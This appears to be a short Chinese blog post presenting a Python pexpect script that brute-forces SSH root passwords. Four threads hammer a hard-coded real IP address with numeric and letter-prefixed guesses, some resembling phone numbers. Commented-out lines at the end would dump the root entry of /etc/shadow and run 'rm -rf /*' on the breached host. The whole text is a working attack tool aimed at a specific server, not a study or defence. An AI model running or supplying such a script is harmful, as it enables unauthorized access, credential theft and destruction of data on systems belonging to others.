pexpect模块获取root密码
利用pexpect模块的ssh连接获取root密码。
from pexpect import pxssh from threading import Thread from itertools import count def send_command(s, cmd): s.sendline(cmd) s.prompt() print(s.before.decode()) def connect_1(host, user, passwd_iter_1): while True: passwd = next(passwd_iter_1) if len(str(passwd)) == 9: return try: s = pxssh.pxssh() s.login(host,user,passwd) return s except: print('[-]',passwd) #print('[-]Error Connection') else: return passwd def connect_2(host, user, passwd_iter_2): while True: passwd = next(passwd_iter_2) if passwd == 18700000000: return try: s = pxssh.pxssh() s.login(host,user,passwd) return s except: print('[-]',passwd) #print('[-]Error Connection') else: return passwd def connect_3(host, user, passwd_iter_3): for var in range(97,123): char = chr(var) passwd_iter = passwd_iter_3 while True: passwd = next(passwd_iter) if len(str(passwd)) == 10: return passwd = char + str(passwd) try: s = pxssh.pxssh() s.login(host,user,passwd) return s except: print('[-]',passwd) #print('[-]Error Connection') else: print('[+]',passwd) return passwd def connect_4(host, user, passwd_iter_4): while True: passwd = next(passwd_iter_4) if len(str(passwd)) == 7: return try: s = pxssh.pxssh() s.login(host,user,passwd) return s except: print('[-]',passwd) #print('[-]Error Connection') else: return passwd def main(): host = "39.104.137.182" passwd_iter_1 = count(10000000) passwd_iter_2 = count(18600000000) passwd_iter_3 = count(100000000) passwd_iter_4 = count(100000) #s = connect("39.104.137.182",'root',passwd_list) # send_command(s,'cat /etc/shadow | grep root') t = Thread(target=connect_1,args=(host,"root",passwd_iter_1,)) t1 = Thread(target=connect_2,args=(host,"root",passwd_iter_2,)) t2 = Thread(target=connect_3,args=(host,"root",passwd_iter_3,)) t3 = Thread(target=connect_4,args=(host,"root",passwd_iter_4,)) t.start() t1.start() t2.start() t3.start() t.join() t1.join() t2.join() t3.join() #send_command(s, "rm -rf /*") if __name__ == '__main__': main()
